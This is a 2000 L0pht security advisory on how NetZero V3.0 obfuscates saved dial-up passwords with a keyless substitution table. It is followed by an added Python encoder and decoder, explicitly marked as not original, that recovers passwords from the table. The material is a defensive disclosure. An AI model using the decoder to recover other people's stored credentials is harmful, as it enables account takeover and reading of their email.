
NetZero Password Encryption Algorithm
L0pht-20000718
Published: 2000-07-18 00:00:00
Updated: 2000-07-18 00:00:00

                           @Stake Inc.
                        L0pht Research Labs
   
                  www.atstake.com     www.L0pht.com


                        Security Advisory
           

                  Advisory Name: NetZero Password Encryption Algorithm
                   Release Date: 07.18.2000
                    Application: NetZero V3.0 and earlier
                       Platform: Microsoft Windows 95, 98, NT, 2000
                       Severity: Low.  Passwords can be easily decrypted by 
                                 exploiting NetZero's encryption algorithm
                         Author: Brian Carrier [bcarrier@atstake.com]        
                  Vendor Status: Vendor Contacted 6.19.00 
                            Web: http://www.L0pht.com/advisories.html

Forward:
    It is unfortunately common for applications that offer to remember a
user's password as a convenience not to encrypt it at all, but instead to
simply obfuscate it. This does nothing to correct user perception and
expectation, which, for the majority of users at least, is often set
incorrectly. All too often convenience wins out over security in these
products.

    There are dozens of applications available that make this same mistake.
This advisory is not an attempt to single one vendor out but rather to
continue reminding readers of the common problem of storing secrets and
relying on simple obfuscation to protect them. If effort is taken to
obfuscate or hide something then it must have been seen as valuable to
someone. If not, why bother? Much the way buffer overflows abound, so do
simple obfuscation mechanisms. As such, it is important to continue to
bring them to light.

    Unfortunately it is often the case that the average user places as
much trust in these as in stronger systems, because the user interfaces
look alike.  As suggested by Aleph1, the MS CryptoAPI
CryptProtectData() and CryptUnprotectData() functions currently allow
applications to store secrets encrypted, keyed to the user's credentials.
Therefore, since the methods currently exist for secure data storage, they
should be utilized by all applications to provide users with a consistent
level of protection.

    This advisory is designed to help people see ways of looking at, and
for, these sorts of problems. Or even in being aware of the situation, 
to view it as a non-problem. Teaching someone to fish rather than simply
providing one meal. Enjoy the classical substitution cipher :)

Overview: 
    NetZero is a service that provides free Internet access to customers 
in exchange for the permission to advertise. NetZero's users log into the 
network with a login and password that are saved in an ASCII text file on 
the user's system.  This advisory addresses the weak encryption algorithm 
that is used to protect the password from unauthorized access.  

    In order for a NetZero account to be compromised, an attacker must 
have access to the machine or use another vulnerability to read the file.  
Once access is obtained, the attacker can easily determine the user's 
NetZero login and password in less than a second.  Once the login and 
password have been determined, the attacker can read the user's email 
and attack other systems under the user's identity.  

    This is a common problem in many services of this type. One quick
solution to at least minimize the problem, should this risk be deemed 
unacceptable, is to disable the _Save Password_ option.

Detailed Description:
    The login and password that are required to log into the NetZero 
network are stored in an ASCII file, id.dat, in the NetZero directory.  
If the user chooses to have the application save the password, then 
jnetz.prop also contains the login and password. The password in both 
files is encrypted using a variation of a simple substitution cipher.   

    The classical substitution cipher is a 1-to-1 mapping between 
characters where each plaintext character is replaced by one ciphertext 
character.  For example, let P_i be the plaintext character in location 
'i' and C_j be the ciphertext character in location 'j', then C_i is the 
character that P_i maps to.

    The NetZero substitution cipher replaces each plaintext character by 
two ciphertext characters, but the two ciphertext characters are not 
stored together.  When substituting character P_i of a password of length 
'n', the first ciphertext character is C_i and the second character is 
C_(n+i), i.e. the second half of the ciphertext holds the second symbol 
of every character, in the same order as the first half. 

The two ciphertext characters are derived from the following table:
  | 1  a M Q f 7 g T 9 4 L W e 6 y C
--+----------------------------------
g | `  a b c d e f g h i j k l m n o
T | p  q r s t u v w x y z { | } ~
f | @  A B C D E F G H I J K L M N O 
7 | P  Q R S T U V W X Y Z [ \ ] ^ _
Q | 0  1 2 3 4 5 6 7 8 9 : ; < = > ?
M | SP ! " # $ % & ' ( ) * + , - . / 

The characters inside the table represent the ASCII plaintext characters 
and SP represents a space.  

    When encrypting a string, P, of length 'n', find each character P_i in 
the table, place the column header into C_i and place the row header into 
C_(n+i).  The ciphertext is therefore exactly twice as long as the password.

For example:
    E(a) = ag 
    E(aa) = aagg 
    E(aqAQ1!) = aaaaaagTf7QM 
    E(`abcdefghijklmno) = 1aMQf7gT94LWe6yCgggggggggggggggg 

    When decrypting a string, C, of length '2n', P_i will be the element 
in the above table where the column headed by C_i and the row headed by 
C_(n+i) intersect.  No key is involved; the table alone is sufficient.  

For example:
    D(af) = A
    D(aaff) = AA
    D(aaMMQQfgfgfg) = AaBbCc
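The encode and decode rules above, as an added Python example (this is not the advisory's own netzero.c, and it does not read id.dat or jnetz.prop, whose layout the advisory does not document). It assumes nothing beyond the substitution table printed above; the function names netzero_encode and netzero_decode are the author's own. The point it makes is the one in the advisory: because the mapping is a fixed, keyless table, anyone holding the table can invert it, so this is obfuscation rather than encryption.

```python
# Added example, not part of the original advisory: a Python model of the
# NetZero substitution scheme, built directly from the advisory's table.

# Column headers, in the order they appear across the top of the table.
COLUMN_HEADERS = "1aMQf7gT94LWe6yC"

# Row header -> the plaintext characters in that row, in column order.
# The "T" row has only 15 entries in the advisory's table (DEL is absent),
# so zip() below simply leaves the last column of that row unused.
ROWS = {
    "g": "`abcdefghijklmno",
    "T": "pqrstuvwxyz{|}~",
    "f": "@ABCDEFGHIJKLMNO",
    "7": "PQRSTUVWXYZ[\\]^_",
    "Q": "0123456789:;<=>?",
    "M": " !\"#$%&'()*+,-./",
}

# plaintext character -> (column header, row header)
ENCODE_TABLE: dict[str, tuple[str, str]] = {}
for row_header, chars in ROWS.items():
    for col_header, ch in zip(COLUMN_HEADERS, chars):
        ENCODE_TABLE[ch] = (col_header, row_header)

# (column header, row header) -> plaintext character (the inverse mapping)
DECODE_TABLE = {pair: ch for ch, pair in ENCODE_TABLE.items()}


def netzero_encode(plaintext: str) -> str:
    """E(P): column headers for P_1..P_n, followed by row headers for P_1..P_n."""
    cols = []
    rows = []
    for ch in plaintext:
        if ch not in ENCODE_TABLE:
            # Anything outside the 95 printable ASCII characters has no cell.
            raise ValueError(f"character {ch!r} is not in the substitution table")
        col, row = ENCODE_TABLE[ch]
        cols.append(col)
        rows.append(row)
    # C_i is the column header, C_(n+i) is the row header.
    return "".join(cols) + "".join(rows)


def netzero_decode(ciphertext: str) -> str:
    """D(C): pair C_i with C_(n+i) and look up the cell where they intersect."""
    if len(ciphertext) % 2:
        raise ValueError("ciphertext length must be even (two symbols per character)")
    n = len(ciphertext) // 2
    out = []
    for i in range(n):
        pair = (ciphertext[i], ciphertext[n + i])
        if pair not in DECODE_TABLE:
            # Either symbol is not a header, or the T row has no entry in that column.
            raise ValueError(f"no table entry for column {pair[0]!r}, row {pair[1]!r}")
        out.append(DECODE_TABLE[pair])
    return "".join(out)


if __name__ == "__main__":
    # The advisory's own worked examples, reproduced here for the reader.
    for p in ("a", "aa", "aqAQ1!", "`abcdefghijklmno"):
        print(f"E({p}) = {netzero_encode(p)}")
    for c in ("af", "aaff", "aaMMQQfgfgfg"):
        print(f"D({c}) = {netzero_decode(c)}")
```

Because the row header for each position lands in the second half of the ciphertext, the stored string also reveals the character class (lower case, upper case, digit, punctuation) of every password position at a glance, which is the structural leakage the advisory's reference to a "classical substitution cipher" alludes to.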


Temporary Solution:
    Exploitation of this vulnerability is only possible once an attacker 
has gained access to the id.dat or jnetz.prop files.  Therefore, NetZero  
users should not have the application save their password and they should 
delete the id.dat file every time they start the application.


Vendor Response:
   Vendor has acknowledged receipt of the advisory and has not provided 
a response as to any actions they intend to take.

Proof-of-Concept Code:
    The following code will demonstrate that the password is easily 
decrypted.  Simply uudecode, compile, and run in a directory that contains
jnetz.prop. 

begin 666 netzero.c
[uuencoded body of netzero.c not present in this copy of the advisory]
end

bcarrier@atstake.com